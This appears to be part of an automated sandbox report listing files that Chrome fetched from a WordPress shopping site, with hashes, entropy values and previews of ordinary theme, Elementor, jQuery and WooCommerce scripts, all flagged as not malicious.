                                                                                                          Preview:(function ($, elementor) {. "use strict";. var Elementskit = {. init: function () {. var widgets = {. 'fmtpl-images-gallery.default': Elementskit.Gallery_init,. 'fmtpl-carousel-reviews.default': Elementskit.Carousel,. 'fmtpl-carousel-images.default': Elementskit.Carousel,. 'fmtpl-carousel-products.default': Elementskit.Carousel,. 'fmtpl-carousel-posts.default': Elementskit.Carousel,. 'fmtpl-carousel-testimonial.default': Elementskit.Carousel,. //'fmtpl-products-tabs.default': Elementskit.Carousel,. 'fmtpl-countdown.default': Elementskit.CountDown,. 'fmtpl-deal.default': Elementskit.CountDown,. 'fmtpl-carousel-product-banner.default': Elementskit.Carousel,. 'fmtpl-carousel-categories-banner.default': Elementskit.Carousel,. 'fmtpl-writer-banner.default': Elementskit.TextRotate,.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (11513), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11513
                                                                                                          Entropy (8bit):5.205720179763049
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:wNmuf8NM+UHN9Rr7lZBNWzd4PMfm/vx3imWAel/L0Fx18b2VautyX2fkiYgu0OOJ:wwuf8N5UHvRr5ZBNW+PMfm/hibLexa2b
                                                                                                          MD5:EFC27E253FAE1B7B891FB5A40E687768
                                                                                                          SHA1:AD12044651FFAC0BADCD0E42F32EDEF91678B1FF
                                                                                                          SHA-256:46E36DD6CA93014E4915C723632BF180D27CC96CCFB7C26E69213E1A82129A62
                                                                                                          SHA-512:42FAD6D6BEEAB116CBE8B149DF6B64D65C4998C0A2CC0562BC831AD02ACD82F2B6B9B33836047AAFD6C2D7CF31A6E91FEACA42A2FA6C6077B7F737DEA40D36E6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1381
                                                                                                          Entropy (8bit):4.155987463755011
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:248Zea1ehQqpuJhXjlKmhWmaCl/MyOZuN7NJJbqAFuyO3uN82JNM7yakKVec5:tbsjlXJl0y79kyOv7yaku
                                                                                                          MD5:539092F09851831781110DE6A65DB57C
                                                                                                          SHA1:C7DB2DA2B3CE5BBD25903CD7171F5925240A01BF
                                                                                                          SHA-256:3E381AA7C77118147B136C636228D244CAF39E25E51AE60632A25C52AF218EA6
                                                                                                          SHA-512:14440CFF2585022B6645F3F0B4771A0AB07524813364DD05579A50B9B27B5690965B168F5F8FC29011C7602F3C36BAA9314A2707D43891396A237DB317D8A3E6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.8
                                                                                                          Preview:(function ($, elementor) {. "use strict";. var Ciena_Element = {. init: function () {. var widgets = {. 'ciena-category-background.default': Ciena_Element.Category_background. };. $.each(widgets, function (widget, callback) {. elementor.hooks.addAction('frontend/element_ready/' + widget, callback);. });. },. Category_background: function (e) {. var e_cb = e.find('.ciena-category-background');. if (e_cb.length) {. $(document).on("mouseover",'.ciena-category-background .categories-item' ,function () {. var $this = $(this);. if ($this.hasClass('selected')){. return false;. }. var id = $this.data('id');. $('.ciena-category-background .categories-item').removeClass('selected');. $this.addClass('selected');..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3417
                                                                                                          Entropy (8bit):4.720593575324692
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Kf7TtFFGRZEFrDGHEFl8nhYCth7HMl7MhpuMJf:Kf7TtFFGRZEFrDGHEFl8nh1thToohpuE
                                                                                                          MD5:A5B2995D05355AF729CDE2B6B0FBDFAB
                                                                                                          SHA1:AEE05E6ED41B531C753CA6C6C564C1FD31377B40
                                                                                                          SHA-256:92D4C7E119674BA3A44DDF403CE01859245EEB43309C6101DF0AB7AB7DDC8E63
                                                                                                          SHA-512:FA2BEC157AB48FB5DFF569F29D6C47A5A7D8772800F78110856037E1C4CE29A74C9007A3438A53900AD2BE335C42F0367F5344A395D641FC81C4DCCF9D9CA389
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_radios() {. if (icheck_skin != 'none') {. jQuery('.woof_radio_term').iCheck('destroy');.. jQuery('.woof_radio_term').iCheck({. radioClass: 'iradio_' + icheck_skin.skin + '-' + icheck_skin.color, . });.. jQuery('.woof_radio_term').off('ifChecked');. jQuery('.woof_radio_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').removeClass('woof_radio_term_reset_visible');. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').hide();. jQuery(this).parents('li').eq(0).find('.woof_radio_term_reset').eq(0).addClass('woof_radio_term_reset_visible');. var slug = jQuery(this).data('slug');. var name = jQuery(this).attr('name');. var term_id = jQuery(this).data('term-id');. woof_radio_direct_search(term_id, name, slug);.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (422)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13500
                                                                                                          Entropy (8bit):4.85125588026711
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:7r5+1saiRijr5Pzuxw79yY9rGYJZjeL49EILg5hicx6Tj:7r5+1saiCNtyY9f3yATj
                                                                                                          MD5:E260840BB555C3BC7C03242BDD4D2375
                                                                                                          SHA1:98D84D42673CEC9BFD7A31F9C4CDA6FDAD183892
                                                                                                          SHA-256:676AD760EE97B5521AFAB69DE01DBBA8181DE641E23C4738CF1C0B2CC2BDEAB6
                                                                                                          SHA-512:1DB53E1ED833108484B1B73402E146F0312CA36973A033E6C5451B1595F3C73FD6F0A5355225AB8DDDD746F6F56B23B368D9EFB07983EDA25AB2919946E7995D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8
                                                                                                          Preview:/*--------------------------------------------------------------.# Defined Variable.--------------------------------------------------------------*/./*--------------------------------------------------------------.# Global Style - FM Theme.--------------------------------------------------------------*/.svg.fm-icon:hover {. fill: #97d1dc;. stroke: #97d1dc;.}...woocommerce #respond input#submit.btn-advance, .familab_theme #respond input#submit.btn-advance, .woocommerce a.button.btn-advance, .familab_theme a.button.btn-advance, .woocommerce button.button.btn-advance, .familab_theme button.button.btn-advance, .woocommerce button.button.alt.btn-advance, .familab_theme button.button.alt.btn-advance, .woocommerce input.button.btn-advance, .familab_theme input.button.btn-advance {. background: #97d1dc;.}...fmc-announcement-box .fm-countdown-time .box-count {. background: #97d1dc;.}..familab_theme .fmc-announcement-box .announcement_btn a {. background: #97d1dc;.}...top-bar.dark *:hover,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10150)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10332
                                                                                                          Entropy (8bit):5.175424441862342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:TrxXtNLOw5Lx/jq/XOnAm5M5f6IyfGmojJnd9:TrxXt4AN/DNxojJnP
                                                                                                          MD5:6BDD4DCA7CB09218E1860E6E0CA8A823
                                                                                                          SHA1:DFF6AC08D3CCF6F1D4F31C2D77FFA19E5ED112EE
                                                                                                          SHA-256:B7F28F2464E085279A304D2ABEE8F0C89F82077338DFE0DD44882ED0D53D018C
                                                                                                          SHA-512:69C128B655B22B150090D585FAE2D1E2375400EDAC8A8F61A9FD12CBEE07D464AF43820BBF32E21AD55FF12087F9172F51F70943E301A2301C2E5E3A90993990
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Effects 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","./jquery-var-for-color","./vendor/jquery-color/jquery.color","./version"],t):t(jQuery)}(function(u){"use strict";var s,o,r,a,c,e,n,i,f,l,d="ui-effects-",h="ui-effects-style",p="ui-effects-animated";function m(t){var e,n,i=t.ownerDocument.defaultView?t.ownerDocument.defaultView.getComputedStyle(t,null):t.currentStyle,o={};if(i&&i.length&&i[0]&&i[i[0]])for(n=i.length;n--;)"string"==typeof i[e=i[n]]&&(o[e.replace(/-([\da-z])/gi,function(t,e){return e.toUpperCase()})]=i[e]);else for(e in i)"string"==typeof i[e]&&(o[e]=i[e]);return o}function g(t,e,n,i){return t={effect:t=u.isPlainObject(t)?(e=t).effect:t},"function"==typeof(e=null==e?{}:e)&&(i=e,n=null,e={}),"number"!=typeof e&&!u.fx.speeds[e]||(i=n,n=e,e={}),"function"==typeof n&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3826
                                                                                                          Entropy (8bit):4.329716798048804
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:pEMH4252DyPsDmOV4IyNR1bpI9MYhax93Lq3cmWG:qMYQ4HV4IyNR9pFYhY93G3cml
                                                                                                          MD5:D27023098DBE1701B23B3BDDDA5D7B97
                                                                                                          SHA1:AD3B5CE9F16CF2DB43FBDA0F31449BCB7F1B467C
                                                                                                          SHA-256:4BFE601DAF3AEADD7095B0F5709B4DB2538F88653D7140F21D376D4263801D92
                                                                                                          SHA-512:9218E83F79B20EF6BD8D299E4C841FABF39E077287E40BFCCF52CD7A0C391E39EB543F5E34F770A89999E0D53E635FB535E0A2912F303C91E5B5731FA3C06914
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8
                                                                                                          Preview:;(function ($) {. "use strict"; // Start of use strict. /* ---------------------------------------------. Resize mega menu. --------------------------------------------- */. function responsive_megamenu_item(container, element) {. if ( container != 'undefined' ) {. var container_width = 0,. container_offset = container.offset();.. if ( typeof container_offset != 'undefined' ) {. container_width = container.innerWidth();. setTimeout(function () {. $(element).children('.mega-menu-container').css({'max-width': container_width + 'px'});. var sub_menu_width = $(element).children('.mega-menu-container').outerWidth(),. item_width = $(element).outerWidth();. $(element).children('.mega-menu-container').css({'left': '-' + (sub_menu_width / 2 - item_width / 2) + 'px'});. var container_left = container_of
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2139), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2139
                                                                                                          Entropy (8bit):4.957392272918885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:zXMZh1EJeJ89v5ubevJJQaAE8H63yR01e5p3gN3Ydhen+25DKYIokOYuLHSQfI41:PvpZAzH6iR0snQpNn+25ezoOqLwTG
                                                                                                          MD5:B72C1CBB1530A011A27BD9800F26765A
                                                                                                          SHA1:27B825C5D8255F33B8427A059D4545EBD65E1746
                                                                                                          SHA-256:A256FCCECAC3B32AB73C91D79A18747519A1A18023BE05465C933B03523A82E8
                                                                                                          SHA-512:63FEBB24BDB65C39ACC8D355DC5B20D3A1AD94AFC347AB2936C543D8B7A911C2F6D2C1C0146707CDB29BEA85A8F34E7FB6E76AAEE4BC0BEA212EA58835A58025
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:jQuery(function(s){s(".woocommerce-ordering").on("change","select.orderby",function(){s(this).closest("form").trigger("submit")}),s("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(s(this).attr("min"));0<=o&&parseFloat(s(this).val())<o&&s(this).val(o)});var e="store_notice"+(s(".woocommerce-store-notice").data("noticeId")||"");"hidden"===Cookies.get(e)?s(".woocommerce-store-notice").hide():s(".woocommerce-store-notice").show(),s(".woocommerce-store-notice__dismiss-link").on("click",function(o){Cookies.set(e,"hidden",{path:"/"}),s(".woocommerce-store-notice").hide(),o.preventDefault()}),s(".woocommerce-input-wrapper span.description").length&&s(document.body).on("click",function(){s(".woocommerce-input-wrapper span.description:visible").prop("aria-hidden",!0).slideUp(250)}),s(".woocommerce-input-wrapper").on("click",function(o){o.stopPropagation()}),s(".woocommerce-input-wrapper :input").on("keydown",function(o){var e=s(this).parent().find("span.description
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5126
                                                                                                          Entropy (8bit):7.957513975412577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6ccq7FABkCAEZRZ/cKyo0m6kPP1iqJjPDj20nUAXET6Yq582GpdPOJUn:6X2C5ZP/cKOhkPsqJjf582YPkUn
                                                                                                          MD5:F485FFB381BC13DE8CA39BE5AE12B10D
                                                                                                          SHA1:9DB60D69BB9D136DAB05D5AC35AE49F29CD0AE36
                                                                                                          SHA-256:8EFB6E853BEBFDC367BFBE43180AE7183478000C6BFF4C82C965B6A84C4088B2
                                                                                                          SHA-512:F61C31ACF070924F6BF7F45EEA0E52236111DEB695088B66AA6B04806507D3F578AD1B12F0F682E1FDE4D4B73B1CC96B6F8B0B29B73B595664B5A76524728DDE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.(.!..........m....|..K..(6[.h.Y.TSY'pW..%.cPbd.$'M.:35...[.7z5..E......w{..H.Y0...!..I..>....)..M.s....^.(l-..t.+7..&PBNY._.._j.K.^...`...uQK.<C.."..$...@,...#...~..c......{e.v.Mv..$...:(.s.jFm."6|<...6^..n\...o,f|.P.O...hZ........:.k........Dc#.r...fgd&phut..7S.9.....B..(g.....Qo6'b....^.[..j....!.L.5>.....Te;..F...Uv|.R...f..K...1.......*;....T..smr..AT....F%.c]UO..-K.....G...V..W.Lz..2#.Q..J....v....7....h.].f.........k.....[..c...LG..v..L^ ...R)....(......YY..;C.8.....w..:L..G...........d.=D.S..../....J....X.%.y l......U.S.s2..=.g.P.=..:..Jd..]...4e'?..r&w..Ca..2W.......p...C.~.. .d2."N..I.$Wir9,.I....d.9...(...0-.............H..._..1....%...y.sO.ecr.k.!.....k"..l.DJz.[...t..U...o|......5...T.....`;1.I..rw.;...R.9..#<@8..ED..h..J.=E.D.V&S..g..=;..7...f.9..l.m.....z)h.S....K.....t.S.7..(.(g......(.......fa.iC.p..0..`X.KJ.v.$=I...y.k{JY....|.j.A{......g..(.Ii.]..\U.......$P.nz5..z......~E...[..\_w....c..Tt.C..9a..M..x...i..W=R
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10544)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10682
                                                                                                          Entropy (8bit):5.103165363656437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4ASLFBb5B1tkej/q9bPcahsL3SaDY+Nhm4isuSnFqk+n0eH6RxljwNyJJN+fwrE:EXnTj/q9b0auiGYchm5suUqkG6v6UUfL
                                                                                                          MD5:4EEE50AC6F4F364BA3A284D0753DDAE3
                                                                                                          SHA1:A8E7E824E6824AE0B370FF36E2C07CA07276FAE0
                                                                                                          SHA-256:B936DB5880AA9B6B2F26A8D32FC2B689FB75F69D971B94194F16DBA801221FFE
                                                                                                          SHA-512:AD7154338F51A1FD2745D1321412F1D418B76CD99F8B439E5ECBD8CDAA7AC09355EE30D4F26044988ACD739BA8B059CA91316798CB0E9B6432D86F006AD49B02
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! dialogs-manager v4.9.0 | (c) Kobi Zaltzberg | https://github.com/kobizz/dialogs-manager/blob/master/LICENSE.txt. 2021-08-15 18:13 */.!function(p,t){"use strict";var y={widgetsTypes:{},createWidgetType:function(t,e,n){n=n||this.Widget;function i(){n.apply(this,arguments)}var o=i.prototype=new n(t);return o.types=o.types.concat([t]),p.extend(o,e),(o.constructor=i).extend=function(t,e){return y.createWidgetType(t,e,i)},i},addWidgetType:function(t,e,n){return e&&e.prototype instanceof this.Widget?this.widgetsTypes[t]=e:this.widgetsTypes[t]=this.createWidgetType(t,e,n)},getWidgetType:function(t){return this.widgetsTypes[t]}};y.Instance=function(){var n=this,e={},i={};this.createWidget=function(t,e){t=new(y.getWidgetType(t))(t);return t.init(n,e=e||{}),t},this.getSettings=function(t){return t?i[t]:Object.create(i)},this.init=function(t){return p.extend(i,{classPrefix:"dialog",effects:{show:"fadeIn",hide:"fadeOut"}},t),e.body=p("body"),n},n.init()},y.Widget=function(n){function e(t,e){var
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (31915)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39773
                                                                                                          Entropy (8bit):5.129384739656525
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:VF14PRTj2hFH9LVAyFbPmyge7ggCn9Ql3MKLhFIAKU4iqZDA1nuNlg3ALvPoLuSM:kmv/AyFsU4imDAGtl
                                                                                                          MD5:FC1812C205C79CC9DBB4B9E8D4335226
                                                                                                          SHA1:B5346EA70F811295DF4227638324BA66B2B108CC
                                                                                                          SHA-256:C1AFB0DA1D792306039017751FD405AC18E034061A19A1B1170074F66A4714AA
                                                                                                          SHA-512:9CFB182ED6F05FED5CCEA61B342CE24FC5BFC6A2944C092E34DF3FAE74D14879AF1FC40471633B407BDA3B92B9D39A826AAE20CA4FE357476C9F95C079B831DE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){function b(a){this.$container,this.constraints=null,this.__$tooltip,this.__init(a)}function c(b,c){var d=!0;return a.each(b,function(a,e){return void 0===c[a]||b[a]!==c[a]?(d=!1,!1):void 0}),d}function d(b){var c=b.attr("id"),d=c?h.window.document.getElementById(c):null;return d?d===b[0]:a.contains(h.window.document.body,b[0])}function e(){if(!g)return!1;var a=g.document.body||g.document.documentElement,b=a.style,c="transition",d=["Moz","Webkit","Khtml","O","ms"];if("string"==typeof b[c])return!0;c=c.charAt(0).toUpperCase()+c.substr(1);for(var e=0;e<d.length;e++)if("string"==typeof b[d[e]+c])return!0;return!1}var f={animation:"fade",animationDuration:350,content:null,contentAsHTML:!1,contentCloning:!1,debug:!0,delay:300,delayTouch:[300,500],functionInit:null,functionBefore:null,functionRea
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1241)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1392
                                                                                                          Entropy (8bit):5.270206775867599
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NkMNLbUSHLXW1xo89Z4eXBOf019BNOG7tkYsPCqcZtkIiiApmCHjpiUtJmcDFP59:NkPSHLXF1eXkfEjpZqcrw9VHL+iQC
                                                                                                          MD5:4F8F624A1F37DED882A2E982A07ECE34
                                                                                                          SHA1:B1ADADACB1A2120B1579E731115F003C91167823
                                                                                                          SHA-256:6407A9FFC16173F1D3330525F44A332501D2ED672CF276371A6C5CE2C4B9EA1E
                                                                                                          SHA-512:329D62BC0F1B1A12B72EA3C7F3A94A45B706DBAE8887AFBBFA0D45A2AFA176BC06DF0D823C0850BC52C4CC254D61ADC82EF9F6517B8504752136FC49A76900DF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery Cookie Plugin v1.4.1. * https://github.com/carhartl/jquery-cookie. *. * Copyright 2013 Klaus Hartl. * Released under the MIT license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(a){var o=/\+/g;function s(e){return x.raw?e:encodeURIComponent(e)}function m(e,n){e=x.raw?e:function(e){0===e.indexOf('"')&&(e=e.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{return e=decodeURIComponent(e.replace(o," ")),x.json?JSON.parse(e):e}catch(n){}}(e);return"function"==typeof n?n(e):e}var x=a.cookie=function(e,n,o){var i,t;if(n!==undefined&&"function"!=typeof n)return"number"==typeof(o=a.extend({},x.defaults,o)).expires&&(t=o.expires,(i=o.expires=new Date).setTime(+i+864e5*t)),document.cookie=[s(e),"=",(t=n,s(x.json?JSON.stringify(t):String(t))),o.expires?"; expires="+o.expires.toUTCString():"",o.path?"; path="+o.path:"",o.domain?"; domain="+o.domain:"",o.secure?"; secure":""].join(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9251)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):244801
                                                                                                          Entropy (8bit):5.453841413977933
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:/FLeYH8SRWJ/37OeR8NteqZEbkxZNsucrl0xYurPK713cCq:/FLeYcYWJzH8NNfFcrHurPK713Rq
                                                                                                          MD5:C9C37DBE6B077A4AAEEEA29AF4857656
                                                                                                          SHA1:E9A790D720E436BA047D67C4D441E840D660433D
                                                                                                          SHA-256:C4EB49795F7A703429E7012CEC0A556E6FAF6F551F07CD337F66C5A1EC3A5847
                                                                                                          SHA-512:660F8CD397BAFA6D8F44BA4C2CD066AAF934A69B5E608D6CE63636240E339ACFF93AE9B72F6B01C4E29BF9C89B11A73C2D5D3F36EFEAD5194D138B38F7E0DFA4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (43353)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43392
                                                                                                          Entropy (8bit):5.408544605819908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:0TOcp4IW+3ExKTnyHLhdsD5ORvdqKqN+JeVyTUpX68POMIe7wwHXXYB53r6Oikzv:06cp4IOxKTyHLwDcRvdMNUeVyQpX682/
                                                                                                          MD5:F047DF9A35C9DB95B0BB24A98A863892
                                                                                                          SHA1:A22FD5F8D8D749CB217E34212668637687B193F1
                                                                                                          SHA-256:7CE5EBAA76613684B5EBF327FE920F0AC2F7577E8F816E02F108B2B144B3E316
                                                                                                          SHA-512:189BE8D714AD2473E791B2B94AE8636BECAF3349565095ED705694745D22ADD4EB1C002E123C6DE3633F76E900F4EBD57F0AD82F2130611EC38CB1AF64A30376
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[882,723,209,745,120,192,520,181,791,268,357],{5526:e=>{e.exports=function _defineProperty(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e},e.exports.default=e.exports,e.exports.__esModule=!0},8470:(e,t,s)=>{"use strict";var n=s(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=n(s(9728));class Accordion extends i.default{getDefaultSettings(){return{...super.getDefaultSettings(),showTabFn:"slideDown",hideTabFn:"slideUp"}}}t.default=Accordion},9269:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class Alert extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{dismissButton:".elementor-alert-dismiss"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$dismissButton:this.$element.find(e.dismissButton)}}bindEve
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 513x330, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42000
                                                                                                          Entropy (8bit):7.981674651059325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:b45AwXhkVsYz1N93ni5DzR+B7aOtBYUzlXvoqMdX4vkPjnn0Cq7HC8/Owk:b4ywXhkVsYz9nWm70UZXAfdXekPr0ZCD
                                                                                                          MD5:85E20AC73DFE7B8248DA60D0A28A788D
                                                                                                          SHA1:41E18A3DFD153AF842E2D7BEF71577CD91C2A70D
                                                                                                          SHA-256:251EDA10E6C17E0CE42B1AB05794B4A05045B184BC9B4FB843D71989A88A232B
                                                                                                          SHA-512:1EF6187E9DA483B0993DC517009F1ADF1EB13F023C06453F774356037F58B8EB523587C7906C7BCEDF5EA48752A552AA31899FF70BF943EB47EB573C5B361832
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......J...."..............................................................................M.a..0/..%.aY......+.:.Y...!+:.)G.(.F............e.e.+0Dc....p.N....>V...".D.}PxS....[.[.N.X.p..>s.,.I;..cZ....._G..z.Z.F_...e4.M....1J.f...j_..e...1hhu...D.<.......T....[..q...n.:.)....`........6.XL..W.>.<...u.Fq...*.._.W...c.".)S{.f.......}.vPK....7u7=..K...T.Q..h.\T.6....J..E......EL..(Mpk....`.....JZ....c..%6<j...j8......w.z.'.Cl...f.......:.,.9....C..T...).H.|...rye..hr-.Q.,?.........0..6..:....W5..k..lk<.{,....A......{...,..g....E..\._i..O.N.P.]S..S..F.(@.KC..I.G..@?U.ii. .b...).0._p.it..$.p.5L1..=gK..s..d...7t...[...j{.x....'.....B.W....5. ...I.2.|...>].P.)..F.......O,...G.<Y.b...$.;3j...N...g..i.t{..#...............N_.....z...u.k.[...o;....&..s..z..|.S.OF........b.Sh....pEO.{r...W0.).....~.U?
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65280)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):139153
                                                                                                          Entropy (8bit):5.2146927200642335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:Fj2qhgxfeuGMfoqi2ZLjK8ieVlLXCiiSsWRLK7A3dnaKBjY4vHgZsUOUTqiqpBgA:wxoo6desFshaKi+HgZsUOUTqiqM37ER
                                                                                                          MD5:15BB2B8491FC7E84137D65F610E1685A
                                                                                                          SHA1:CD76B70A5426893E9C022B9A75C50A7C1348E2D0
                                                                                                          SHA-256:B23F49F504FAA32AAC548B6662FFD64412F6738496FAB8BE38DA46C5B7121804
                                                                                                          SHA-512:95C05110B29101C84DF71C54172269F478D9CD14965B3DE987613E11E0F1CCF01C1B7D2BF290D97EF11373F24DCCD677F8710E1555D332903181F469D0F2B0BB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
